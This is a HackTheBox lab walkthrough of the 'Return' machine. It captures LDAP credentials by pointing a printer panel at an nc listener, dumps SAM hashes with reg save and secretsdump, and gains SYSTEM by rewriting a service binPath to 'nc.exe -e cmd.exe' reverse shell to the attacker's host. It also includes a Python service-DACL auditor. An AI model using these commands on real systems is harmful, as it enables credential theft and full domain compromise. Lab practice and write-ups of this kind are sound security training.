
HTB — Return

A network printer admin panel leaks its LDAP service account's credentials when the configured server address is pointed at an attacker-controlled listener. That account is a member of Server Operators, which allows reconfiguring a LocalSystem service for domain privilege escalation.

January 22, 2025 · HackTheBox · Easy · Windows
#AD #LDAP #Server Operators #Kerberos

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.108
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 22:33 EST
Stats: 0:01:26 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.51% done; ETC: 22:35 (0:00:00 remaining)
Nmap scan report for 10.10.11.108
Host is up (0.022s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-23 03:52:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
58735/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=1/22%OT=53%CT=1%CU=32959%PV=Y%DS=2%DC=T%G=Y%TM=6791B8F
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=105%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=106%GCD=1%ISR
OS:=108%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=106%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS
OS:=S%TS=U)SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M53CNW8
OS:NNS%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
 
Network Distance: 2 hops
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: 18m34s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-01-23T03:53:53
|_  start_date: N/A
 
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   25.41 ms 10.10.14.1
2   25.73 ms 10.10.11.108
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.32 seconds

80

sh
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0

The admin panel's settings page takes the address of the LDAP server it authenticates against. Pointing that field at the attacker host and submitting the form makes the panel open a plain LDAP connection to it and send a simple BindRequest for its service account, so the bind DN and password arrive in cleartext on a bare listener:

sh
nc -lnvp 389
listening on [any] 389 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.108] 53478
0*`%return\svc-printer
                      1edFg43012!!

The first bytes are BER framing (0x30 0x2a: an LDAPMessage SEQUENCE of 42 bytes; 0x60 0x25: a BindRequest of 37 bytes); what follows is the bind DN and the simple-authentication password. The listener never has to answer: the client sends the credentials before it expects any response, which is why a plain nc is enough.

creds

svc-printer:1edFg43012!!

445

sh
445/tcp   open  microsoft-ds?
sh
smbclient -N -L //10.10.11.108 -U ''
 
        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.108 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

A null session gets nothing (SMB1 is disabled and signing is required), but the captured password is valid for svc-printer over both SMB and WinRM:
sh
nxc smb 10.10.11.108 -u svc-printer -p '1edFg43012!!'
SMB         10.10.11.108    445    PRINTER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\svc-printer:1edFg43012!!
sh
nxc winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
WINRM       10.10.11.108    5985   PRINTER          [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM       10.10.11.108    5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

winrm

sh
evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

user.txt

sh
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cat user.txt
6e891fe8...

priv esc

sh
*Evil-WinRM* PS C:\Users\svc-printer> whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

SeBackupPrivilege

SeBackupPrivilege lets the account read any file or registry hive regardless of its ACL, which is what reg save needs to export SAM and SYSTEM. The target is a domain controller, though (Kerberos, LDAP and the global catalog are all listening), so these SAM entries are the local accounts, not the domain's; domain hashes live in NTDS.dit, which needs a shadow copy to read. The hash is shown for completeness; the escalation used here goes through Server Operators instead.

sh
*Evil-WinRM* PS C:\> mkdir Temp
*Evil-WinRM* PS C:\> reg save HKLM\SYSTEM C:\Temp\system.bak
*Evil-WinRM* PS C:\temp> reg save HKLM\SAM C:\Temp\sam.bak
sh
impacket-secretsdump -sam sam.bak -system system.bak local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435...:34386a77...:::
Guest:501:aad3b435...:31d6cfe0...:::
DefaultAccount:503:aad3b435...:31d6cfe0...:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Server Operators

  • built-in group (SID S-1-5-32-549) whose members can log on to domain controllers, back up and restore files, and start and stop services
  • the successful sc.exe config below shows the group also holds SERVICE_CHANGE_CONFIG on VMTools, a service that runs as LocalSystem; replacing its binary path and restarting it therefore runs an arbitrary command as SYSTEM
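Whether a non-admin account can pull this off on a given service is a question about that service's DACL. The following is an added example (my code, not the writeup's) that parses the SDDL string `sc.exe sdshow <service>` prints and lists the trustees holding the three rights the hijack needs: change config, start and stop. The sample descriptor is constructed to resemble one that grants Server Operators (SO) full control; it is an assumption for illustration, not the real VMTools descriptor from this box.

```python
"""Audit a Windows service DACL for the rights the binPath hijack needs (Python 3, stdlib)."""
import re

# (SDDL code, access-mask bit, name) for the rights that appear in service descriptors.
RIGHTS = [
    ("CC", 0x0001, "SERVICE_QUERY_CONFIG"), ("DC", 0x0002, "SERVICE_CHANGE_CONFIG"),
    ("LC", 0x0004, "SERVICE_QUERY_STATUS"), ("SW", 0x0008, "SERVICE_ENUMERATE_DEPENDENTS"),
    ("RP", 0x0010, "SERVICE_START"), ("WP", 0x0020, "SERVICE_STOP"),
    ("DT", 0x0040, "SERVICE_PAUSE_CONTINUE"), ("LO", 0x0080, "SERVICE_INTERROGATE"),
    ("CR", 0x0100, "SERVICE_USER_DEFINED_CONTROL"), ("SD", 0x10000, "DELETE"),
    ("RC", 0x20000, "READ_CONTROL"), ("WD", 0x40000, "WRITE_DAC"), ("WO", 0x80000, "WRITE_OWNER"),
    ("GA", 0x10000000, "GENERIC_ALL"), ("GX", 0x20000000, "GENERIC_EXECUTE"),
    ("GW", 0x40000000, "GENERIC_WRITE"), ("GR", 0x80000000, "GENERIC_READ"),
]
SID_ALIASES = {  # well-known SDDL trustee aliases seen on services
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
    "SO": "BUILTIN\\Server Operators", "BU": "BUILTIN\\Users", "WD": "Everyone",
    "IU": "NT AUTHORITY\\INTERACTIVE", "SU": "NT AUTHORITY\\SERVICE",
    "AU": "NT AUTHORITY\\Authenticated Users", "NS": "NT AUTHORITY\\NETWORK SERVICE",
    "LS": "NT AUTHORITY\\LOCAL SERVICE",
}
# Reconfigure the binary path, then bounce the service: exactly what sc.exe config/stop/start do.
HIJACK_NEEDS = {"SERVICE_CHANGE_CONFIG", "SERVICE_START", "SERVICE_STOP"}
ACE_RE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*)\)")

# Constructed sample shaped like `sc.exe sdshow` output, with Server Operators (SO) given
# full control. It is an assumption for illustration, not the real VMTools descriptor.
SAMPLE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)"
    "(A;;CCLCSWLOCRRC;;;SU)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)


def decode_rights(field):
    """Expand an SDDL rights field (two-letter codes or a 0x hex mask) into right names,
    including what the generic rights map to on a service object."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        names = {name for _, bit, name in RIGHTS if mask & bit}
    else:
        codes = {field[i:i + 2] for i in range(0, len(field), 2)}
        names = {name for code, _, name in RIGHTS if code in codes}
    if "GENERIC_ALL" in names:
        names |= {name for _, _, name in RIGHTS if not name.startswith("GENERIC")}
    if "GENERIC_WRITE" in names:      # GENERIC_WRITE on a service -> SERVICE_CHANGE_CONFIG
        names.add("SERVICE_CHANGE_CONFIG")
    if "GENERIC_EXECUTE" in names:    # GENERIC_EXECUTE -> start/stop/pause/interrogate/UDC
        names |= {"SERVICE_START", "SERVICE_STOP", "SERVICE_PAUSE_CONTINUE",
                  "SERVICE_INTERROGATE", "SERVICE_USER_DEFINED_CONTROL"}
    if "WRITE_DAC" in names:          # can rewrite the DACL and grant itself everything else
        names |= HIJACK_NEEDS
    return names


def audit_service_sddl(sddl):
    """Return ({trustee: effective rights}, [trustees who can hijack the service])."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]              # drop the SACL, it grants nothing
    allowed, denied = {}, {}
    for ace_type, _flags, rights, _obj, _inh, sid in ACE_RE.findall(dacl):
        who = SID_ALIASES.get(sid, sid)
        bucket = allowed if ace_type == "A" else denied if ace_type == "D" else None
        if bucket is not None:
            bucket.setdefault(who, set()).update(decode_rights(rights))
    for who, rights in denied.items():         # deny ACEs override matching allows
        allowed[who] = allowed.get(who, set()) - rights
    hijackers = sorted(who for who, rights in allowed.items() if HIJACK_NEEDS <= rights)
    return allowed, hijackers


if __name__ == "__main__":
    grants, hijackers = audit_service_sddl(SAMPLE_SDDL)
    for who in sorted(grants):
        print(f"{who:35} {'HIJACKABLE' if who in hijackers else ''}")
```

Run `sc.exe sdshow VMTools` (or any other service) on the target and feed the string to `audit_service_sddl`: any trustee it lists that the foothold user belongs to, Server Operators included, is a service whose binary path can be swapped. Read the other way, it is the audit a defender runs to find services that grant SERVICE_CHANGE_CONFIG to anyone beyond SYSTEM and Administrators.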

sh
*Evil-WinRM* PS C:\temp> upload nc.exe
sh
sc.exe config VMTools binPath="C:\Temp\nc.exe -e cmd.exe 10.10.14.6 1234"
sh
*Evil-WinRM* PS C:\temp> sc.exe qc VMTools
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Temp\nc.exe -e cmd.exe 10.10.14.6 1234
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VMware Tools
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
*Evil-WinRM* PS C:\temp> sc.exe stop VMTools
 
SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Starting the service again (sc.exe start VMTools) makes the service control manager launch the new binary path as LocalSystem. The start call itself reports a timeout (error 1053) because nc.exe never signals the SCM that it is running, but by then the process has already connected back to the listener. On a real engagement, record the original BINARY_PATH_NAME with sc.exe qc before changing it so the service can be restored afterwards:
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.108] 57162
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
whoami
nt authority\system

root.txt

sh
C:\Users\Administrator\Desktop>type root.txt
type root.txt
8897fa4d...